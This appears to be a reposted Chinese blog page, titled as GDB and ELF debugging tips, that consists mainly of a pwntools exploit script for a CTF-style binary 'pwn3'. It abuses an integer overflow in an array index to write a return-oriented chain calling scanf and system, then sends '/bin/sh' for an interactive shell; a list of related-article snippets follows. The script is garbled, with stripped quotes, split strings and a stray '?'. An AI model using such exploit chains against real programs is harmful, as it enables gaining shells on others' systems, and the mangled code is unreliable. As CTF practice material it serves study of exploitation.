2. 程式人生 > >GDB分析ELF檔案常用的除錯技巧

GDB分析ELF檔案常用的除錯技巧

阿新 發佈:2019-02-08 
 1 from pwn import *
 2 
 3 #r = remote(‘127.0.0.1‘, 9527)
 4 r = process(./pwn3)
 5 r.recvuntil(name \n)
 6 r.sendline(123)
 7 #raw_input(‘debug‘
 8 ##構造結構可以是:scanf->ret->”%9s”->某地址->system->填充->某地址。
 9 ?
10 #下面開始構造
11 r.recvuntil(index\n)
12 #-2147483648  -->0x80000000 *4後溢位為0
13 context.terminal = [
 
gnome-terminal,-x,sh,-c] 
14 gdb.attach(proc.pidof(p)[0])
15 r.sendline(str(-2147483648 + 14))  #ebp+4的地址處  就是Return函式的地址  現在是一處地址一處值  1
16 r.recvuntil(value\n)
17 r.sendline(str(int(8048470, 16)))  #jmp  scanf
18 r.recvuntil(index\n)
19 r.sendline(str(-2147483648 + 15))   #ebp+8
20 r.recvuntil(
 
value\n)
21 r.sendline(str(int(0x080487de, 16)))  # pop     edi
22 r.recvuntil(index\n)
23 r.sendline(str(-2147483648 + 16))  
24 r.recvuntil(value\n) 
25 r.sendline(str(int(804884b,16)))  #0804884B a9s      db ‘%9s‘,0 
26 r.recvuntil(index\n)
27 r.sendline(str(-2147483648 + 17))  
28 r.recvuntil(
 
value\n)
29 r.sendline(str(int(804a030, 16)))  #0804A030 __data_star  804a030 是GOT表的結尾
30 r.recvuntil(index\n)
31 r.sendline(str(-2147483648 + 18))
32 r.recvuntil(value\n)
33 r.sendline(str(int(8048420, 16))) #system  #jmp to system
34 r.recvuntil(index\n) 
35 r.sendline(str(-2147483648 + 19))
36 r.recvuntil(value\n)
37 r.sendline(str(int(804a030, 16)))  #0804A030 __data_start    db    0 
38 r.recvuntil(index\n)
39 r.sendline(str(-2147483648 + 20))
40 r.recvuntil(value\n)
41 r.sendline(str(int(804a030, 16)))  #0804A030 __data_start    db    0 
42 r.recvuntil(index\n)
43 r.sendline(str(-2147483648 + 21))
44 r.recvuntil(value\n)
45 r.sendline(str(int(8048420, 16)))  ##system  #jmp to system
46 r.recvuntil(index\n)
47 r.sendline(str(-2147483648 + 22))
48 r.recvuntil(value\n)
49 r.sendline(str(int(8048420, 16)))  ##system  #jmp to system
50 r.recvuntil(index\n)  #相當與讓程式碼結束 執行ret從而執行到我們的流程
51 r.sendline(-1)
52 r.recvuntil(value\n)
53 r.sendline(10)
54 r.recvuntil(0 0 0 0 0 0 0 0 0 0 )
55 r.sendline(/bin/sh)
56 r.interactive()

相關推薦

GDB分析ELF檔案常用除錯技巧

1 from pwn import * 2 3 #r = remote(‘127.0.0.1‘, 9527) 4 r = process(‘./pwn3‘) 5 r.recvuntil(‘name \n‘) 6 r.sendline(‘123‘) 7 #raw_input(‘debug‘

iOS開發之Xcode常用除錯技巧總結

轉載http://www.cocoachina.com/ios/20161102/17884.html   本文為投稿文章,作者:楊社兵 最近在面試,面試過程中問到了一些Xcode常用的除錯技巧問題。平常開發過程中用的還挺順手的,但你要突然讓我說,確實一臉懵逼。Debug的技巧

使用Python分析ELF檔案優化Flash和Sram空間的案例

1. 背景 Zephyr專案Flash和Ram空間比較緊張,有著非常強烈的優化需求。 優化的前提是量化標的,那麼如何量化Flash和Ram的使用量呢? 在量化之後,首先要對量化結果進行分析,然後採取措施進行空間優化。 2. 基於ELF資訊和linker.cmd分析Flash/Ram使用量 linker.cmd

gdb分析core檔案及常見gdb命令操作示例

1.概述 在實際的軟體開發專案中,程式出現問題是在所難免的。遙想本人蔘加工作之後首次遇到程式的情景,至今還歷歷在目。之前的經驗告訴我,我們越是驚慌失措,問題就越是解決不了。我們要先讓自己平靜下來,然後再尋找解決程式問題的辦法。 在Linux下做開發的朋友,想

IDA動態遠端除錯elf檔案的最簡單設定(姿勢)

0x01: 將IDA安裝目錄下的dbgsrv資料夾整個都拷貝到linux下(我都拷貝到了ubuntu桌面) 0x02: 將所要除錯的檔案直接放在dbgsrv目錄下 0x03: IDA設定如下: 0x04: 這裡根據你的elf檔案型別

Microsoft Visual Studio除錯技巧(二):Visual Stdio 2010清理除錯生成的快取檔案

使用Visual Stdio 2010程式設計時,會發現硬碟的空閒空間快速不斷減少,這是因為VS2010在除錯時,會生成快取檔案,字尾名iTrace,很佔空間,需要定期手動清理。 IDE中,在“工具→選項→IntelliTrace→高階→IntelliTrace記錄的位置”可以配置儲存i

GDB常用除錯命令(二)

GDB訊號處理       在GDB中使用handle命令定義一個訊號處理。訊號可以以SIG開頭或不以 SIG開頭,可以用定義一個要處理訊號的範圍(如:SIGIO-SIGKILL,表示處理從SIGIO訊號到SIGKILL的訊號,其中包括SIGIO, SIGIOT,S

Xcode 除錯技巧 --常用命令和斷點

Xcode 中的除錯技巧與我們的日常開發息息相關,而這些除錯技巧在我們解決Bug時,常常有事半功倍的作用,經常會用到的有各種斷點 和 命令。而這些除錯技巧也經常會在面試中問到,所以不知道的就來看看吧。 除錯命令 在上圖中,右側綠色區域就是Log 輸出區,在 Log 輸出區可以使用一些命令,來輔助除錯。 那

GDB遠端除錯程式 & 生成core檔案便於除錯

# GDB遠端除錯程式 **該檔案是用於遠端除錯gdb,資料夾中的gdbserver和arm-linux-gdb的版本已經保持一致均為6.4** 1. target:`./gdbserver6.4 192.168.100.101:8888 ./test_scale`  2. hos

gdb中core檔案除錯

程式執行時,如果有錯誤,則會產生core檔案。 core檔案如何檢視錯誤 在Linux系統下,應用程式崩潰,一般會產生core檔案,如何根據core檔案查詢問題的所在,並做相應的分析和除錯,是非常重要的,本文對此做簡單介紹。 例如,一個程式cmm_test_tool在執行的時候發生了錯誤

Linux逆向---ELF格式分析檔案頭和程式頭

在Linux下,可以利用vim編輯器來對編譯生成後的可執行程式進行編輯,比如說把75jne指令改成74je指令,這樣可以在不重新編譯的情況下去修改程式的控制流,這樣玩感覺還是很有意思的,不過也僅限於此,所以我借了一本書想要學學逆向。。結果發現這本書真的難啃。。如果只是讀它的內容的話很快就讀過

自己動手編寫一個Linux偵錯程式系列之4 ELF檔案格式與DWARF除錯格式

目錄 在上一節中,你已經聽說了DWARF除錯格式,它是程式的除錯資訊,是一種可以更好理解原始碼的方式,而不只是解析程式。今天我們將討論原始碼級除錯資訊的細節,以準備在本教程後面的部分中使用它。 系列索引 準備工作 斷點的設定 暫存器和記憶體 ELF檔案格式

使用Nios II 10.0sp1 Command Shell [gcc3]合併sof和elf檔案——除錯記錄

開發環境: 電腦win7_64;Quartus II 10.0;Nios II 10.0;FPGA:EP4CE10。 1.Nios軟體存在的bug及解決思路: Nios II Flash Programmer 下載後無法從EPCS自舉,具體現象如下: Usin

GDB除錯技巧:總結篇

目錄 一 寫在開頭 1.1 本文內容 二 學習資料 三 常用命令 四 除錯技巧 注:原創不易,轉載請務必註明原作者和出處,感謝支援! 一 寫在開頭 1.1 本文內容 總結GDB除錯的一些常用命令和除錯技巧。不定期更新。 二 學習資料 The

linux core dump 檔案 gdb分析【轉】

core dump又叫核心轉儲, 當程式執行過程中發生異常, 程式異常退出時, 由作業系統把程式當前的記憶體狀況儲存在一個core檔案中, 叫core dump. (linux中如果記憶體越界會收到SIGSEGV訊號,然後就會core dump) 在程式執行的過程中,有

阿里P7常用的幾個JavaScript除錯技巧

我們除錯Javascript一般會用到Chrome和Firefox的控制檯作為除錯工具,本文列出了幾條用於除錯Javascript的技巧,掌握它們,讓我們花更少的時間來解決錯誤和bug,從而提高開發效率。 1. debugger 除了console.log, debugger是我們最

Linux ELF檔案格式分析---objcopy命令的使用

本文轉自:https://blog.csdn.net/xj178926426/article/details/73777611  Linux ELF檔案格式分析—objcopy命令的使用 最近在看《程式設計師的自我修養—連結、裝載與庫》一書,對書中提到的一個小問題,自己做了

linux逆向分析ELF檔案詳解

前言 首先如果大家遇到ELF二進位制檔案的逆向首先考慮的可能就是通過IDA進行靜態逆向分析演算法,那麼我們首先就要了解ELF(Executable and Linking Format)的檔案格式。 ELF檔案格式主要分為以下幾類: 1. 可重定位檔案(Relocatable File),這類檔

pwn 題GDB除錯技巧和exp模板

1 from pwn import * 2 3 #r = remote('127.0.0.1', 9527) 4 r = process('./pwn3') 5 r.recvuntil('name \n') 6 r.sendline('123') 7 #raw_input('debug'

除錯技巧 —— 如何利用windbg + dump + map分析程式異常

Microsoft (R) Windows Debugger Version 6.11.0001.404 X86 Copyright (c) Microsoft Corporation. All rights reserved. Loading Dump File [C:\Test\Release\Log\